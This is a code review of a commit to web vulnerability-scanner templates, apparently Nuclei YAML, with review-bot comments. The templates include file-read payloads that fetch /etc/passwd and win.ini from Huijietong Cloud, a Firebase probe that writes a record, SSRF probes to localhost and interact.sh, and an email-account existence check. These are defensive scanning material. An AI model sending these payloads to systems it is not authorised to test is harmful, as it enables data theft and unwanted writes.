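Review bot: The template has no `tags:` and no `description:`, and it is the only template in this commit that does not query the scan target at all — `self-contained: true` sends the HEAD request to mail.google.com with a user-supplied `{{email}}`, so it ignores the target list and needs `-var email=...` to run. Document both: `description: Checks whether a Google account exists for the supplied email address by querying mail.google.com; requires -var email=<address> and does not touch scan targets.` plus a `tags:` line (e.g. `tags: osint,google`). Matching the single header word `COMPASS` is unexplained — a comment above `words:` naming the response header it is expected in would help.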


@ -0,0 +1,37 @@
id: insecure-firebase-database
info:
name: Insecure Firebase Database
author: rafaelwdornelas
severity: high
description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
reference:
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
metadata:
verified: true
tags: firebase,google,misconfig
requests:
- raw:
- |
PUT /{{randstr}}.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":"insecure-firebase-database"}
- |
GET /{{randstr}}.json HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{"id":"insecure-firebase-database"}'
- type: status
status:
- 200
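Review bot: The first raw request PUTs a `{{randstr}}.json` document into the target database and nothing removes it, so every positive finding leaves a stray record behind; add a third request after the GET — `- |`, `DELETE /{{randstr}}.json HTTP/1.1`, `Host: {{Hostname}}` — so the check cleans up after itself (the `body_2` matcher is unaffected). The description should also state that the check writes to the database, e.g. append `The check writes and then reads back a random key, so it modifies the target.`, and add the `intrusive` tag if the repository uses it.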


@ -29,6 +29,7 @@ requests:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh


@ -21,21 +21,27 @@ requests:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
- |+
GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist
- |+
GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET http://localhost/ HTTP/1.1
Host: localhost
- |+
GET https://localhost/ HTTP/1.1
Host: localhost
unsafe: true
req-condition: true
stop-at-first-match: true


@ -61,4 +61,4 @@ requests:
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# Updated by Chris on 2022/01/21
# Enhanced by cs on 2022/01/21


@ -0,0 +1,27 @@
id: unauthenticated-nginx-dashboard
info:
name: Nginx Dashboard
author: BibekSapkota (sar00n)
severity: low
reference:
- https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-nginx-dashboard/
metadata:
shpdan-query: html:"NGINX+ Dashboard"
tags: misconfig,nginx
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard.html"
max-size: 2048
matchers-condition: and
matchers:
- type: word
words:
- 'Nginx+ Dashboard'
- type: status
status:
- 200
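Review bot: `metadata` has a typo, `shpdan-query`, so anything reading `shodan-query` ignores the key; rename it. The body word `Nginx+ Dashboard` is case-sensitive while the Shodan query looks for `NGINX+ Dashboard` — if the page title actually appears in upper case the matcher never fires, so either align the literal with the observed title or add `case-insensitive: true` to the word matcher. `author: BibekSapkota (sar00n)` also departs from the comma-separated handle convention used elsewhere in this commit.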


@ -18,8 +18,9 @@ network:
- "{{Host}}:9000"
read-size: 100
matchers:
- type: word
words:
- "ClickHouse"
- "UTC"
condition: and
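Review bot: Requiring `UTC` with `condition: and` ties detection to the server's configured timezone — as far as I can tell that word comes from the timezone field in ClickHouse's hello response — so an instance running in any other timezone is no longer detected. If the intent is to reduce false positives on the bare `ClickHouse` word, match a second protocol-specific token instead, or keep `UTC` but document the trade-off in a comment above `words:`. The `network:` block this hunk belongs to starts outside the hunk.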


@ -5,6 +5,9 @@ info:
author: philippedelteil
severity: info
description: With this template we can detect the version number of Coldfusion instances based on their logos.
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion
requests:


@ -7,6 +7,9 @@ info:
description: With this template we can detect a running ColdFusion instance due to an error page.
reference:
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion
requests:


@ -1,8 +1,8 @@
id: nginx-version
info:
name: nginx version detect
author: philippedelteil
name: Nginx version detect
author: philippedelteil,daffainfo
severity: info
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
tags: tech,nginx
@ -11,20 +11,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "nginx+"
- 'nginx/[0-9.]+'
- type: status
status:
- 200
extractors:
- type: kval
- type: regex
part: header
kval:
- Server
regex:
- 'nginx/[0-9.]+'
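Review bot: Keeping the `status: 200` matcher under `matchers-condition: and` means a server whose `/` answers 301, 403 or 404 is not fingerprinted even though the `Server: nginx/x.y.z` header is present on those responses too; the new regex already requires a version string, so the status matcher adds little — drop it, or widen it to the redirect and error codes you expect. Since the header regex matcher and the extractor now carry the same pattern, a one-line comment above `extractors:` noting they must stay in sync would help.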


@ -9,9 +9,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
matchers:
- type: regex
part: body
part: header
regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
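Review bot: The regex anchors on a case-sensitive `Location` header name; with `part: header` the raw header block is matched, and some servers and HTTP/2 responses may emit `location:` in lower case, so prefix the pattern with `i` — `(?im)^(?:Location\s*:\s*)...` — to avoid a false negative. Moving the probe to `example.com` is a good change; the enclosing `info` block is outside the hunk.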


@ -2,8 +2,10 @@ id: huijietong-cloud-fileread
info:
name: Huijietong Cloud File Read
author: princechaddha
author: princechaddha,ritikchaddha
severity: high
metadata:
fofa-query: body="/him/api/rest/v1.0/node/role"
tags: huijietong,lfi
requests:
@ -12,12 +14,19 @@ requests:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/Windows/win.ini'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
